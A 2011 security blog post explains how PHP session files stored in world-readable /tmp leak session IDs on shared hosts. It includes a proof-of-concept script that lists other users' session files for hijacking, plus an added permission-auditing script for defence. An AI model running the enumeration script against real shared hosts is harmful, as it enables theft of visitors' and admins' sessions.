Thursday, August 4, 2011

Local Session Hijacking in PHP

Recently I discovered that the shared hosting provider I sometimes use is susceptible to this age-old technique that everyone really should know about by now.

PHP's default session handler stores session data in files, and by default these files are placed in /tmp. In a shared environment, session files should never be placed in a directory that a malicious local user can read, such as the world-readable /tmp directory.

Even if the session files themselves are protected from being read or written by a malicious user, their names leak valuable information. A typical session file name reads "sess_0m9gnkgenne66kvs3eklhvucjmdpchto". All the numbers and letters following "sess_" are the value of the PHPSESSID cookie that the session is tied to. Any local user who can enumerate the files in this directory can therefore hijack the cookies belonging to the visitors of all the websites located on the shared host. One of them might belong to an admin of one of the local websites.

POC

Here is a short script to enumerate session files and their respective local owner.

```php
<?php
// http://ha.xxor.se/2011/08/local-session-hijacking.html

// Retrieve the path where session files are saved
session_save_path(); // Might have to be called twice... not sure.
$sesspath = session_save_path();

if(php_sapi_name()!=='cli')echo "<pre>\n";

// Test session.save_handler
$sessmod = session_module_name();
if(empty($sessmod))$sessmod = ini_get('session.save_handler');
echo "[i] Session save handler: $sessmod\n";
if($sessmod !== 'files'){
    echo "[!] Possible Error: session.save_handler is set to '$sessmod' instead of 'files'. Trying anyway.\n";
}

if(empty($sesspath)){
    $sesspath = ini_get('session.save_path');
    if(empty($sesspath)){
        if(function_exists('sys_get_temp_dir')){
            $sesspath = sys_get_temp_dir();
        }else{
            die('Error: Cannot find session save path. Try setting it manually.');
        }
    }
}
// save_path may carry a "N;" or "N;MODE;" prefix; the directory is the last field.
// array_pop() needs a real variable, so the exploded parts are stored first.
$parts = explode(';',$sesspath);
$sesspath = array_pop($parts);
echo "[i] Session save path: $sesspath\n";

// Enumerate sessions and their owner.
clearstatcache();
echo "\nOwner           File\n";
if(!findSessIn($sesspath)){
    die("[!] Error: Cannot open the session save path.\n");
}

function findSessIn($dir){
    if(!($handler = opendir($dir))){
        return false;
    }
    // Compare against false explicitly: an entry named "0" would otherwise end the loop.
    while (($file = readdir($handler)) !== false){
        $path = substr($dir, -1) === DIRECTORY_SEPARATOR ? $dir.$file : $dir.DIRECTORY_SEPARATOR.$file;
        if (substr($file, 0, 5) === 'sess_'){
            $owner = fileowner($path);
            if(function_exists('posix_getpwuid')){
                $owner = posix_getpwuid($owner);
                $owner = $owner['name'];
            }
            // Pad the owner column to a fixed width.
            if(strlen($owner) < 16)$owner = substr($owner.str_repeat(' ',15), 0, 15);
            echo "$owner $path\n";
        }elseif(strlen($file) === 1 && is_dir($path) && $file !== '.'){
            // Single-character subdirectories are used when save_path has a depth prefix.
            findSessIn($path);
        }
    }
    closedir($handler);
    return true;
}
?>
```

To find out which website corresponds to which local user, simply visit the website, grab your cookie and then search for its value and the local user in the list.
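The defensive counterpart, as an added example that is not part of the original post: a check that flags a session directory whose permissions allow the file-name leak described above, run first against a constructed weak and hardened directory and then against the directory the running PHP is configured to use. The function names, the demo directory and the demo session file name are made up for illustration.

```php
<?php
// Added example (not from the original post). All names here are illustrative.
// session.save_path may be "N;/path" or "N;MODE;/path": the directory is the last field.
function session_dir_from_ini(string $raw): string {
    $parts = explode(';', $raw);
    $dir = trim((string) end($parts));
    return $dir !== '' ? $dir : sys_get_temp_dir(); // empty setting: PHP uses the temp dir
}

// Returns a list of findings; an empty list means nothing was flagged.
// Only the top level is inspected, not the subdirectories used with an "N;" prefix.
function audit_session_dir(string $dir): array {
    if (!is_dir($dir)) { return ["$dir is not a directory"]; }
    clearstatcache();
    $findings = [];
    $mode = fileperms($dir) & 07777;
    if ($mode & 0004) { // read bit for "other" is what allows listing file names
        $findings[] = sprintf('mode %04o lets any local user list sess_<id> names', $mode);
    }
    if ($mode & 0002) {
        $findings[] = 'directory is world-writable shared space, like /tmp';
    }
    if (function_exists('posix_geteuid') && fileowner($dir) !== posix_geteuid()) {
        $findings[] = 'directory is not owned by the user PHP runs as';
    }
    $exposed = 0;
    foreach (@scandir($dir) ?: [] as $name) {
        if (strncmp($name, 'sess_', 5) === 0 && (fileperms("$dir/$name") & 0044)) {
            $exposed++;
        }
    }
    if ($exposed > 0) {
        $findings[] = "$exposed session file(s) readable by group or other";
    }
    return $findings;
}

// Constructed demo: a throwaway directory set up the weak way, then hardened.
$demo = sys_get_temp_dir() . '/sessaudit_demo_' . getmypid();
$file = "$demo/sess_constructedexampleid";
mkdir($demo); touch($file);
chmod($demo, 0755); chmod($file, 0644);
echo 'weak:     ', implode('; ', audit_session_dir($demo)) ?: 'no findings', "\n";
chmod($demo, 0700); chmod($file, 0600);
echo 'hardened: ', implode('; ', audit_session_dir($demo)) ?: 'no findings', "\n";
unlink($file); rmdir($demo);
// The directory this PHP process is actually configured to use.
$live = session_dir_from_ini((string) ini_get('session.save_path'));
echo "live ($live): ", implode('; ', audit_session_dir($live)) ?: 'no findings', "\n";
```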

20 comments:

  1. @Anonymous
    @Lagripe-dz

    Thank you.
    If you like messing with session, stay tuned.
    I've got an interesting series of articles about session poisoning coming up.

  2. Please keep this kind of blog-posts coming.

    The articles are very well written, and give good insights that other blogs don't.

    Thx for sharing :]
